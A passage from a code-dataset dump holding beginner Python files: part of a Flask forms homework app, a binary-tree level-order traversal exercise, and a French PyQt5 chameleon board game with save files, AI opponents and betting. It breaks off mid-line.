\n # \"\"\"\n\n@app.route('/froyo_results')\ndef show_froyo_results():\n \"\"\"Shows the user what they ordered from the previous page.\"\"\"\n context = {\n \"users_froyo_flavor\": request.args.get('flavor'),\n \"users_froyo_toppings\": request.args.get('toppings')\n }\n return render_template('froyo_results.html', **context)\n # Below is the previous version of this function\n # \n # users_froyo_flavor = request.args.get('flavor')\n # users_froyo_toppings = request.args.get('toppings')\n # return f'You ordered {users_froyo_flavor} flavored Fro-Yo with {users_froyo_toppings} toppings!'\n\n@app.route('/favorites')\ndef favorites():\n \"\"\"Shows the user a form to choose their favorite color, animal, and city.\"\"\"\n return \"\"\"\n
\n What is your favorite color?
\n
\n What is your favorite animal?
\n
\n What is your favorite city?
\n
\n \n
\n \"\"\"\n\n@app.route('/favorites_results')\ndef favorites_results():\n \"\"\"Shows the user a nice message using their form results.\"\"\"\n users_fav_color = request.args.get('color')\n users_fav_animal = request.args.get('animal')\n users_fav_city = request.args.get('city')\n return f\"Wow, I didn't know {users_fav_color} {users_fav_animal}s lived in {users_fav_city}!\"\n\n@app.route('/secret_message')\ndef secret_message():\n \"\"\"Shows the user a form to collect a secret message. Sends the result via\n the POST method to keep it a secret!\"\"\"\n return \"\"\"\n
\n Enter your secret message below:
\n
\n \n
\n \"\"\"\n\n@app.route('/message_results', methods=['POST'])\ndef message_results():\n \"\"\"Shows the user their message, with the letters in sorted order.\"\"\"\n # Retrieve the message with `request.form.get()` because POST request used\n input_message = request.form.get('message')\n # Sort the message by calling the helper function defined at the top of the file\n sorted_message = sort_letters(input_message)\n return f\"Here's your encrypted secret message: {sorted_message}\"\n\n@app.route('/calculator')\ndef calculator():\n \"\"\"Shows the user a form to enter 2 numbers and an operation.\"\"\"\n return render_template('calculator_form.html')\n # Below is the previous version of this function\n # \n # return \"\"\"\n #
\n # Please enter 2 numbers and select an operator.

\n # \n # \n # \n # \n #
\n # \"\"\"\n\n@app.route('/calculator_results')\ndef calculator_results():\n \"\"\"Shows the user the result of their calculation.\"\"\"\n # Retrieve the two operands and cast them as integers and retrieve the operation selected from the drop-down menu\n context = {\n 'operand1': int(request.args.get('operand1')),\n 'operand2': int(request.args.get('operand2')),\n 'operation': request.args.get('operation')\n }\n # Compute the calculation based on the operation selected and add the result to the `context` dictionary\n if context['operation'] == \"add\":\n context['result'] = context['operand1'] + context['operand2']\n elif context['operation'] == \"subtract\":\n context['result'] = context['operand1'] - context['operand2']\n elif context['operation'] == \"multiply\":\n context['result'] = context['operand1'] * context['operand2']\n elif context['operation'] == \"divide\":\n context['result'] = context['operand1'] / context['operand2']\n\n return render_template('calculator_results.html', **context)\n # Below is the previous version of this function\n # \n # # Retrieve the two operands and cast them as integers\n # operand1 = int(request.args.get('operand1'))\n # operand2 = int(request.args.get('operand2'))\n # # Retrieve the operation selected from the drop-down menu\n # operation = request.args.get('operation')\n # # Compute the calculation based on the operation selected\n # if operation == \"add\":\n # result = operand1 + operand2\n # elif operation == \"subtract\":\n # result = operand1 - operand2\n # elif operation == \"multiply\":\n # result = operand1 * operand2\n # elif operation == \"divide\":\n # result = operand1 / operand2\n # return f\"You chose to {operation} {operand1} and {operand2}. Your result is: {result}.\"\n \n\n\n# List of compliments to be used in the `compliments_results` route (feel free \n# to add your own!) \n# https://systemagicmotives.com/positive-adjectives.htm\nlist_of_compliments = [\n 'awesome',\n 'beatific',\n 'blithesome',\n 'conscientious',\n 'coruscant',\n 'erudite',\n 'exquisite',\n 'fabulous',\n 'fantastic',\n 'gorgeous',\n 'indubitable',\n 'ineffable',\n 'magnificent',\n 'outstanding',\n 'propitioius',\n 'remarkable',\n 'spectacular',\n 'splendiferous',\n 'stupendous',\n 'super',\n 'upbeat',\n 'wondrous',\n 'zoetic'\n]\n\n@app.route('/compliments')\ndef compliments():\n \"\"\"Shows the user a form to get compliments.\"\"\"\n return render_template('compliments_form.html')\n\n@app.route('/compliments_results')\ndef compliments_results():\n \"\"\"Show the user some compliments.\"\"\"\n # Save keys and values from compliments_form.html\n context = {\n 'users_name': request.args.get('users_name'),\n 'wants_compliments': request.args.get('wants_compliments'),\n 'num_compliments': int(request.args.get('num_compliments'))\n }\n # Append the dictionary with a random sample of compliments (dictionary name cannot be called before initialization)\n context['random_compliments'] = random.sample(list_of_compliments, k=context['num_compliments'])\n\n return render_template('compliments_results.html', **context)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"GSPuniani/Homework-2-Forms","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32458775897","text":"\"\"\"\nGiven a binary tree, return the level order traversal of its \nnodes' values. (ie, from left to right, level by level).\n\"\"\"\ndef getMaxDepth(root):\n if root == None:\n return 0\n return max(getMaxDepth(root.left), getMaxDepth(root.right))+1\n\ndef levelOrderInternal(root, dipLen):\n if root is None:\n return []\n if dipLen == 0:\n return root.value()\n return levelOrderInternal(root.left,dipLen-1)+levelOrderInternal(root.right,dipLen-1)\n \ndef levelOrderTraversal(root):\n maxDepth = getMaxDepth(root)\n retArr = []\n for i in range(maxDepth):\n retArr.append(levelOrderInternal(root,i))\n\ndef levelOrderQueue(root):\n queue = [root]\n while len(queue) > 0:\n currNode = queue.pop()\n print(currNode)\n if currNode.left:\n queue.insert(0,currNode.left)\n if currNode.right:\n queue.insert(0,currNode.right)\n \n ","repo_name":"BassP97/CTCI","sub_path":"Med/levelOrderTraversal.py","file_name":"levelOrderTraversal.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"74650756639","text":"import sys #Pour l'interface\nimport os #Pour la suppression du fichier de sauvegarde\nfrom jeu import * #Importation des éléments de jeu.py qui gèrent le gameplay\nfrom PyQt5 import QtGui, QtCore, QtWidgets, uic #Importations d'éléments de PyQt5\nfrom pygame import mixer #Pour gérer la musique de fond\nmixer.init() #On initialise un mixer\nmixer.music.load('jungle.mp3') #On charge la musique de fond\n\n\"\"\"@auteurs : Pierre Savignac et François Schmidt\"\"\"\n\n\nclass JeuUi(QtWidgets.QMainWindow):\n \"\"\"La classe JeuUi correspond à la fenêtre de départ qui permet de choisir à quel mode de jeu\n on veut jouer, de reprendre une partie sauvegardée, ou d'afficher les règles\"\"\"\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n self.ui = uic.loadUi('interface.ui', self) #Chargement de l'interface associée\n self.ui.bouton_un_joueur.clicked.connect(self.un_joueur) #Bouton pour le mode 1 joueur\n self.ui.bouton_deux_joueurs.clicked.connect(self.deux_joueurs) #Bouton pour le mode 2 joueurs avec mise\n self.ui.bouton_ia_facile.clicked.connect(self.ia_facile) #Bouton pour le mode IA facile\n self.ui.bouton_ia_normale.clicked.connect(self.ia_normale) #Bouton pour le mode IA normale\n self.ui.bouton_ia_difficile.clicked.connect(self.ia_difficile) #Bouton pour le mode IA difficile\n self.ui.bouton_ia_impossible.clicked.connect(self.ia_impossible)#Bouton pour le mode IA très difficile\n self.ui.regle.clicked.connect(self.regles_jeu) #Bouton pour afficher les règles du jeu\n self.ui.sauveg.clicked.connect(self.recup_sauv) #Bouton pour reprendre la partie sauvegardée\n\n self.ui.actionSupprimer_la_sauvegarde.triggered.connect(self.suppr) #Dans onglet options permettant de supprimer la sauvegarde\n self.ui.actionQuitter.triggered.connect(self.close) #Dans onglet options pour quitter le jeu\n\n self.c = Cameleon() #Création du caméléon\n self.p = Plateau(7, 7, self.c,self) #Création du plateau avec les dimensions, le caméléon et l'interface en paramètres\n self.a = Arbitre(self.p,self.c) #Création de l'arbitre (et donc de la mise) avec le plateau et le caméléon en paramètres\n\n self.window2 = PlateauUi(self.p, self.a, 1) #Cette fenêtre est le plateau de jeu qui s'ouvrira une fois le mode choisi (initialisé mode 1 joueur)\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_cameleon.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #Importation de la police \"Jungle Roar\" dans python grace à QtGui\n self.label_2.setFont(QtGui.QFont('Jungle Roar',pointSize=28)) #Le titre de la fenêtre sera écrit avec cette police\n\n\n def un_joueur(self):\n self.window2 = PlateauUi(self.p, self.a,1) #Plateau avec un 1 en paramètre pour plateau 1 joueur\n self.window2.show() #On l'affiche\n self.a.mise_en_place_jetons() #On choisi une disposition aléatoire de jetons\n self.window2.actualiser_jetons() #On place les jetons sur le plateau\n self.a.nbre_joueurs=1 #Pour que window2.play() sache quel mode de jeu a été choisi\n self.close() #Fermeture du menu de selection\n mixer.music.play() #Permet de lancer la musique de fond\n\n def deux_joueurs(self):\n NamesUi(self).show() #On ouvre la fenêtre pour rentrer les noms des 2 joueurs\n self.close() #Fermeture du menu de selection\n\n def ia_facile(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Facile'\n self.close()\n mixer.music.play()\n\n def ia_normale(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Normale'\n self.close()\n mixer.music.play()\n\n def ia_difficile(self):\n self.window2 = PlateauUi(self.p, self.a, 1) #Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia='Difficile'\n self.close()\n mixer.music.play()\n\n def ia_impossible(self):\n self.window2 = PlateauUi(self.p, self.a, 1) # Même principe que la méthode un_joueur()\n self.window2.show()\n self.a.mise_en_place_jetons()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia = 'Impossible'\n self.close()\n mixer.music.play()\n\n def suppr(self): #Méthode permettant de supprimer le fichier de sauvegarde\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n\n def regles_jeu(self):\n ReglesUi().show() #Affiche la fenêtre des règles du jeu\n self.close() #Ferme la fenêtre du menu\n\n def recup_sauv(self): #Cette méthode sert à relancer une partie sauvegardée\n fichier=True\n try: #On essaye d'ouvrir le fichier de sauvegarde s'il existe\n f = open('sauvegarde.txt', 'r')\n except EnvironmentError:\n fichier=False\n if fichier==True: #S'il existe\n self.p[self.p.c.pos[0], self.p.c.pos[1]] = 0 #On efface l'ancien caméléon sur le plateau\n f = open('sauvegarde.txt', 'r') #On ouvre le fichier de sauvegarde en mode lecture\n typ_interface = int(f.readline()) #La première ligne est un entier correspondant au type de partie\n a = f.readline() #La deuxième ligne correspond à la position du caméléon '30\" pour (3,0)\n self.p.c.pos = (int(a[0]), int(a[1])) #On replace le caméléon en conséquence\n self.p[self.p.c.pos[0], self.p.c.pos[1]] = 9 #Et on l'affiche sur la plateau\n plato = f.readline() #Composition du plateau\n compteur = 0\n for i in range(1, 6):\n for j in range(1, 6):\n self.p[i, j] = plato[compteur] #On reconstitue le plateau tel qu'il était\n compteur += 1\n ia=f.readline() #Difficulté de l'IA (Normale si c'est pas un mode avec ia)\n if typ_interface == 1: #Si c'est un mode solo\n self.window2 = PlateauUi(self.p, self.a, 1) #Plateau avec un 1 en paramètre pour plateau 1 joueur\n self.window2.show() #On l'affiche\n self.window2.actualiser_jetons() #On place les jetons sur le plateau\n self.a.nbre_joueurs = 1 #Pour que window2.play() sache quel mode de jeu a été choisi\n self.close() #Fermeture du menu de selection\n if typ_interface==3: #Pareil pour le mode avec ia\n self.window2 = PlateauUi(self.p, self.a, 1)\n self.window2.show()\n self.window2.actualiser_jetons()\n self.a.nbre_joueurs = 3\n self.a.difficulte_ia = ia\n self.close()\n if typ_interface==4: #Si c'est le mode 2 joueurs, des lignes supplémentaires on été écrites\n j1 = f.readline() #Le nom de joueur 1\n j2 = f.readline() #Le nom du joueur 2\n tour=int(f.readline()) #La variable tour_joueur pour savoir à qui c'est de jouer\n miz=int(f.readline()) #L'état de la mise\n deja_miz=eval(f.readline()) #Le booléen deja_mise. eval() permet de transformer 'True' en True de type booléen\n recet=eval(f.readline()) #Le booléen a_reset\n geton=int(f.readline()) #La variable jeton_mise\n pts1=int(f.readline()) #Le nombre de points du joueur 1\n pts2=int(f.readline()) #Le nombre de points du joueur 2\n topik=f.readline() #La phrase écrite en bas à droite\n self.a.liste_joueurs = [Joueur(j1[:-1]), Joueur(j2[:-1])] #On crée les joueurs dans la liste de joueurs de l'arbitre de window2\n self.a.liste_joueurs[0].points=pts1 #On leur redonne leurs points\n self.a.liste_joueurs[1].points=pts2\n self.window2 = PlateauUi(self.p, self.a,2) #2 en paramètre pour charger le plateau de 2 joueurs\n\n self.window2.tour_joueur = tour #On remet dans les bonnes variable les valeurs de ces variables\n self.window2.a.m.mise=miz\n self.window2.deja_mise=deja_miz\n self.window2.a_reset=recet\n self.window2.jeton_mise=geton\n self.window2.topic.setText(topik)\n self.window2.actu_sauvegarde() #La méthode actu_sauvegarde est dans la classe PlateauUi et permet d'actualiser tous ces changements\n\n self.window2.show() #Affichage du plateau\n self.window2.actualiser_jetons() #Affichage de ces derniers\n self.a.nbre_joueurs = 4 #Nbre_joueurs=4 pour le mode 2 joueurs avec mise\n self.window2.repaint() #Actualisation de l'interface\n self.close() #Fermeture du menu\n mixer.music.play()\n\n self.window2.sauv=True #Pour indiquer qu'on a chargé une partie sauvegardée\n f.close() #Fermeture du fichier de sauvegarde que l'on a ouvert\n\n\n\nclass NamesUi(QtWidgets.QMainWindow):\n \"\"\"Classe d'une fenêtre permettant de rentrer les noms des deux joueurs qui vont s'affronter dans le mode 2 joueurs\"\"\"\n def __init__(self,ui):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #Importation de la police \"Jungle Roar\". Bizarrement, il faut la mettre dans chaque classe... Et cela ne fonctionne pas en dehors d'une classe\n self.ui = uic.loadUi('names.ui', self) #On charge le bon fichier pour l'interface\n self.ui.bouton_jouer.clicked.connect(self.jouer) #Pour le bouton jouer qui lancera la fenêtre avec le plateau\n self.fenetre=ui #self.fenetre -> fenêtre ouverte avant celle-ci, de type JeuUi\n\n self.n1.setFont(QtGui.QFont('Jungle Roar', pointSize=19)) #Certains textes seront écrits avec cette police pour faire joli\n self.n2.setFont(QtGui.QFont('Jungle Roar', pointSize=19))\n self.label_2.setFont(QtGui.QFont('Jungle Roar', pointSize=22))\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_names.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def jouer(self):\n #Lorsqu'on clique sur le bouton jouer\n name1 = self.nom_joueur_1.toPlainText() #On récupère les noms des joueurs\n name2 = self.nom_joueur_2.toPlainText()\n self.fenetre.a.liste_joueurs = [Joueur(name1), Joueur(name2)] #On crée les joueurs dans la liste de joueurs de l'arbitre de window2\n self.fenetre.window2 = PlateauUi(self.fenetre.p, self.fenetre.a, 2) #2 en paramètre pour charger le plateau de 2 joueurs\n self.fenetre.window2.show() #Affichage du plateau\n self.fenetre.a.mise_en_place_jetons() #Mise en place des jetons\n self.fenetre.window2.actualiser_jetons() #Affichage de ces derniers\n self.fenetre.a.nbre_joueurs = 4 #Nbre_joueurs=4 pour le mode 2 joueurs avec mise\n self.close() #On ferme cette fenêtre\n mixer.music.play() #On lance la musique de fond\n\n\n\nclass PlateauUi(QtWidgets.QMainWindow):\n \"\"\"Plateau de jeu\"\"\"\n def __init__(self,plat,arb,typ):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police dans cette classe\n\n if typ==1:\n self.ui = uic.loadUi('plat.ui', self) #Si typ==1, alors on charge le plateau 1 joueur\n self.titre.setFont(QtGui.QFont('Jungle Roar', pointSize=28))\n self.ui.actionSauvegarder_et_quitter.triggered.connect(self.sauvegarder_j1) #Onglet du menu permettant de sauvegarder en mode 1 joueur\n if typ==2:\n self.ui = uic.loadUi('plat2.ui', self) #Sinon, on charge le plateau 2 joueurs qui est différent\n self.nom_j1.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n self.nom_j2.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n self.ui.actionSauvegarder_et_quitter.triggered.connect(self.sauvegarder_j2) #Onglet du menu permettant de sauvegarder en mode 2 joueurs\n\n self.ui.actionRetour_menu.triggered.connect(self.retour_menu) #Si on clique sur l'onglet retour menu, la méthode retour_menu se lancera (devinez ce qu'elle va faire..)\n\n self.c_rouge = QtGui.QPixmap('insect_rouge.png') #On charge les images des jetons\n self.c_vert = QtGui.QPixmap('insect_vert.png')\n self.c_jaune = QtGui.QPixmap('insect_jaune.png')\n self.c_bleu = QtGui.QPixmap('insect_bleu.png')\n self.c_gris = QtGui.QPixmap('insect_gris.png')\n self.c_mort = QtGui.QPixmap('insect_mort.png')\n\n self.c_cameleon = QtGui.QPixmap('camé.jpg') #On charge les images du caméléon\n self.cameleon_haut= QtGui.QPixmap('cam_haut.png')\n self.cameleon_bas= QtGui.QPixmap('cam_bas.png')\n self.cameleon_gauche= QtGui.QPixmap('cam_gauche.png')\n self.cameleon_droite= QtGui.QPixmap('cam_droite.png')\n\n self.c_vide = QtGui.QPixmap('vide.jpg') #On charge quelques images utiles\n self.c_rien = QtGui.QPixmap('rien.png') #Un png sans fond\n self.jeton= QtGui.QPixmap('jeton_mise.png')\n self.haut= QtGui.QPixmap('branche_bas.png') #Les contours du terrain avec des branches pour le délimiter\n self.bas= QtGui.QPixmap('branche_haut.png')\n self.droite= QtGui.QPixmap('branche_gauche.png')\n self.gauche= QtGui.QPixmap('branche_droite.png')\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan (elles n'ont pas changé)\n pixmap = QtGui.QPixmap(\"arrierPlanBlanchi2.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n self.p = plat #On récupère le plateau provenant de window en argument de la classe\n self.a = arb #De même pour l'arbitre\n\n if typ == 2: #Si c'est le plateau 2 joueurs\n self.nom_j1.setText(str(self.a.liste_joueurs[0].id)) #On affiche le nom des joueurs au bon endroit\n self.nom_j2.setText(str(self.a.liste_joueurs[1].id))\n self.indic.setFont(QtGui.QFont('Jungle Roar', pointSize=18)) #Avec la jolie police\n self.indic.setText(str(self.a.liste_joueurs[0].id)+', a toi de jouer') #On indique à qui c'est de jouer\n self.ui.mise_j1.clicked.connect(self.miser_j1) #On paramètre les boutons pour les mises\n self.ui.mise_j2.clicked.connect(self.miser_j2)\n self.score_j1.setFont(QtGui.QFont('Jungle Roar', pointSize=14)) #Et encore de la modification de police\n self.score_j2.setFont(QtGui.QFont('Jungle Roar', pointSize=14))\n self.affichage_mise.setFont(QtGui.QFont('Jungle Roar', pointSize=20))\n self.topic.setFont(QtGui.QFont('Jungle Roar', pointSize=16))\n\n self.choix_ui=42 #On initalise le choix de ce que le joueur veut manger à un valeur bidon\n self.resultats=ScoresUi(self) #Resultats sera l'interface qui affichera les résultats\n self.mise=MiseUi(self) #Mise sera l'interface pour accepter ou refuser une augmentation de mise\n self.peut_jouer=True #Permet de savoir si le joueur peut jouer (et qu'il clique pas partout pendant le tour de l'ordi pour tout faire planter)\n self.a_reset=False #Permet de savoir si la méthode PlateauUi.reset() a été utilisée\n\n self.tour_joueur = 1 #Permet de savoir à qui c'est le tour\n self.deja_mise=False #Permet de savoir si on a deja fait une surrenchère de mise ce tour\n self.jeton_mise=0 #Indique où est le jeton de mise (0 au milieur, 1 joueur 1, et 2 joueur 2)\n self.sauv=False #Permet de savoir si on joue une partie sauvegardée\n\n\n def actu_sauvegarde(self):\n \"\"\"Pour réinitialiser le plateau correctement lorsqu'on relance une partie\n que l'on a sauvegardée\"\"\"\n if self.tour_joueur % 2 == 1 or self.tour_joueur == 1:\n self.indic.setText(str(self.a.liste_joueurs[0].id) + ', a toi de jouer') #On indique à qui c'est de jouer\n else:\n self.indic.setText(str(self.a.liste_joueurs[1].id) + ', a toi de jouer')\n self.affichage_mise.setText('Mise : ' + str(self.a.m)) #On affiche la nouvelle valeur de mise\n if self.jeton_mise==0:\n self.jeton_j1.setPixmap(self.c_rien) #On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n elif self.jeton_mise==1: #Et on le remet où il faut\n self.jeton_j1.setPixmap(self.jeton.scaled(self.jeton_j1.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) # On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n elif self.jeton_mise==2:\n self.jeton_j1.setPixmap(self.c_rien)\n self.jeton_j2.setPixmap(self.jeton.scaled(self.jeton_j2.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.score_j1.setText('Score : ' + str(self.a.liste_joueurs[0].points)) #On actualise les scores\n self.score_j2.setText('Score : ' + str(self.a.liste_joueurs[1].points))\n self.sauv=True #On indique que joue une partie sauvegardée\n self.repaint() #On actualise l'affichage\n\n\n def sauvegarder_j1(self): #Sauvegarde d'un plateau type 1\n f=open('sauvegarde.txt','w') #On ouvre/crée le fichier de sauvegarde\n f.write(str(self.a.nbre_joueurs)+'\\n') #On écrit le type\n f.write(str(self.p.c.pos[0])+str(self.p.c.pos[1])+'\\n') #La position du caméléon\n for i in range(1,6):\n for j in range(1,6):\n f.write(str(int(self.p[i,j]))) #La composition du plateau de jeu\n f.write('\\n'+self.a.difficulte_ia) #La difficulté de l'ia ('normale' si mode 1 joueur)\n f.close() #On ferme le fichier\n self.retour_menu() #Et on appelle la méthode self.retour_menu() qui retourne au menu\n\n def sauvegarder_j2(self): #Pareil qu'au dessus\n f=open('sauvegarde.txt','w')\n f.write(str(self.a.nbre_joueurs)+'\\n')\n f.write(str(self.p.c.pos[0])+str(self.p.c.pos[1])+'\\n')\n for i in range(1,6):\n for j in range(1,6):\n f.write(str(int(self.p[i,j])))\n f.write('\\n'+self.a.difficulte_ia+'\\n')\n f.write(self.a.liste_joueurs[0].id) #Mais on enregistre quelques données en plus comme les noms de joueurs\n f.write('\\n')\n f.write(self.a.liste_joueurs[1].id)\n f.write('\\n')\n f.write(str(self.tour_joueur)) #A qui c'est de jouer\n f.write('\\n')\n f.write(str(self.a.m.mise)) #La mise\n f.write('\\n')\n f.write(str(self.deja_mise)) #La variable booléenne deja_mise\n f.write('\\n')\n f.write(str(self.a_reset)) #La variable booléenne a_reset\n f.write('\\n')\n f.write(str(self.jeton_mise)) #L'entier jeton mise\n f.write('\\n')\n f.write(str(self.a.liste_joueurs[0].points)) #Le nombre de points des joueurs\n f.write('\\n')\n f.write(str(self.a.liste_joueurs[1].points))\n f.write('\\n')\n f.write(str(self.topic.text())) #La phrase écrite en bas à droite\n f.close()\n self.retour_menu() #Et on retourne au menu\n\n\n def retour_menu(self): #Cette fonction permet de retourner à l'écran titre pendant la partie\n self.close() #On ferme la fenêtre plateau\n JeuUi().show() #Et on réouvre un nouveau menu\n\n\n def mousePressEvent(self, event):\n \"\"\"Méthode qui se lance quand on clique et qui retourne des coordonées\"\"\"\n if event.button() == QtCore.Qt.LeftButton:\n self.info.setText(' ') #On réinitialise ce champs de texte\n coords = [event.x(), event.y()] #Coordonées du clic\n if self.peut_jouer==True: #Si on peut jouer\n l = 215 #Ordonnée du coin haut gauche du plateau\n L = 345 #Abscisse du coin haut droit du plateau\n i = 0\n j = 0\n while coords[0] > L + j * 83: #83 car 80 pixels de largeur de case + 3 pixels d'interstice entre 2 cases\n j += 1\n while coords[1] > l + i * 83:\n i += 1\n #i et j sont la ligne et la colonne de l'endroit cliqué\n if i==self.p.c.pos[0] and j==self.p.c.pos[1]: #Si on clique sur le caméléon\n self.info.setText(\"Ne te mange pas toi même s'il te plaît\") #On affiche un petit message rigolo (dédicace à Marceau Michel)\n if (i >= 1 and i <= 5) and (j >= 1 and j <= 5) and self.peut_jouer == True: #Si on clique sur une case dans le plateau et qu'on peut jouer\n if self.p.c.pos[0] == i: #Si on mange dans une ligne\n self.choix_ui = self.p[i, j] #Le choix est le type de jeton sur lequel on clique. C'est ici que le choix prend sa valeur !\n if self.p[i, j] != 0: #Et si c'est pas un jeton déjà mangé\n self.play() #On peut jouer\n elif self.p.c.pos[1] == j: #Si on mange dans une colonne\n self.choix_ui = self.p[i, j] #La même\n if self.p[i, j] != 0:\n self.play()\n else: #Si on clique en dehors du plateau\n pass #Bah on fait rien\n\n\n def play(self):\n \"\"\"Méthode qui remplace la méthode Arbitre.jouer() permettant donc d'articuler le jeu.\n Elle appelle les méthode de la classe Arbitre de jeu.py qui ont été conçues pour faire fonctionner le jeu\"\"\"\n if self.a.nbre_joueurs==1: #Si c'est le mode 1 joueur\n self.p.un_tour_joueur() #On fait jouer en appelant Plateau.un_tour_joueur()\n self.actualiser_jetons() #On actualise les jetons\n if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on se retrouve face à une ligne/colonne de 0\n self.resultats.show() #On affiche la fenêtre résultat parce que la partie est terminée\n if self.a.jetons_restants()==0: #S'il reste 0 jetons\n self.resultats.message.setText('Vous gagnez !') #On affiche qu'il a gagné\n else: #Sinon\n self.resultats.message.setText('Il vous reste ' + str(self.a.jetons_restants()) + ' jetons') #On affiche le nombre de jetons restants\n\n elif self.a.nbre_joueurs==3: #Mode avec IA\n self.p.un_tour_joueur() #On fait jouer le joueur\n self.actualiser_jetons() #On actualise le plateau\n self.repaint() #On rafraîchit l'interface --> permet au joueur de jouer, attendre (avec l'actualisation puis le time.sleep), puis l'ordi joue\n if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on est face a une ligne de 0\n self.resultats.show() #On ouvre la fenêtre de résultat car on a gagné\n self.resultats.message.setText(\"Vous gagnez\") #Avec la message suivant\n else: #Sinon, c'est au tour de l'ordi\n self.peut_jouer=False #Peut_jouer=False pour pas que le joueur clique partout et interfere avec le plateau quand l'ordi joue\n self.ui.info.setText(\"L'ordi joue\") #On précise que l'ordi joue\n self.repaint() #On actualise l'interface pour que le message s'affiche\n time.sleep(1) #On attends une seconde pour que le joueur se rende compte de ce qui a été joué\n if self.a.difficulte_ia == 'Facile': #Si l'IA est facile\n self.p.un_tour_ia_facile() #On appelle cette fonction\n if self.a.difficulte_ia == 'Normale': #Si l'IA est normale\n self.p.un_tour_ia_normale() #On appelle celle la\n if self.p.coup_gagnant == False: #Si on a pas trouvé de choix gagnant Arbitre.coup_gagnant est faux\n self.p.un_tour_ia_facile() #Donc on joue au hasard en appelant l'IA dacile\n if self.a.difficulte_ia == 'Difficile': #Si l'IA est difficile\n self.p.un_tour_ia_difficile() #On appelle cette fonction\n if self.a.difficulte_ia == 'Impossible':#Si l'IA est très difficile\n self.p.un_tour_ia_impossible() #On appelle cette fonction\n self.actualiser_jetons() #On actualise le plateau\n if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si on se retrouve face a une ligne/colonne de 0\n self.resultats.show() #On affiche la fenêtre résultats\n self.resultats.message.setText(\"L'ordi gagne\") #Et on dit que l'ordi gagne\n self.peut_jouer = True #Le joueur peut rejouer\n\n elif self.a.nbre_joueurs==4: #Mode deux joueurs avec mise\n self.a_reset=False #a_reset initialisé à False\n if self.tour_joueur%2==1 or self.tour_joueur==1: #Si c'est au tour du joueur 1\n self.p.un_tour_joueur_mise(self.a) #On appelle la fonction Plateau.un_tout_joueur_mise pour le tour du J1\n self.actualiser_jetons() #On actualise le plateau\n self.indic.setText(str(self.a.liste_joueurs[1].id)+', a toi de jouer') #On indique que c'est au joueur 2 de joueur\n if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0] and (self.a.liste_joueurs[0].points+self.a.m.mise)>=5: #Si le joueur 2 perd la manche et que le joueur 1 a plus de 5 points\n self.a.liste_joueurs[0].points += self.a.m.mise #On augmente les points du joueur 1\n self.score_j1.setText('Score : ' + str(self.a.liste_joueurs[0].points)) #On actualise son score\n if self.a.m.mise>1:\n self.topic.setText(str(self.a.liste_joueurs[0].id) + ' a gagne ' + str(self.a.m.mise) + ' points') #On précise que le joueur 1 a gagné tant de points\n else:\n self.topic.setText(str(self.a.liste_joueurs[0].id) + ' a gagne ' + str(self.a.m.mise) + ' point') #On précise que le joueur 1 a gagné tant de points\n self.resultats.show() #On affiche la fenêtre de résultats\n self.resultats.message.setText(str(self.a.liste_joueurs[0].id)+\" gagne avec : \"+str(self.a.liste_joueurs[0].points)+\" points\") #On indique que le joueur 1 a remporté la partie\n elif self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]: #Si le joueur 2 perd la manche mais le joueur n'a pas les 5 points pour gagner la partie\n self.peut_jouer=False\n self.repaint()\n time.sleep(0.5)\n self.peut_jouer=True\n self.a.liste_joueurs[0].points+=self.a.m.mise #On augmente les points du joueur 1\n self.score_j1.setText('Score : '+str(self.a.liste_joueurs[0].points)) #On actualise son score\n if self.a.m.mise>1:\n self.topic.setText(str(self.a.liste_joueurs[0].id)+' a gagne '+str(self.a.m.mise)+' points') #On affiche combien de points il a gagné\n else:\n self.topic.setText(str(self.a.liste_joueurs[0].id)+' a gagne '+str(self.a.m.mise)+' point') #On affiche combien de 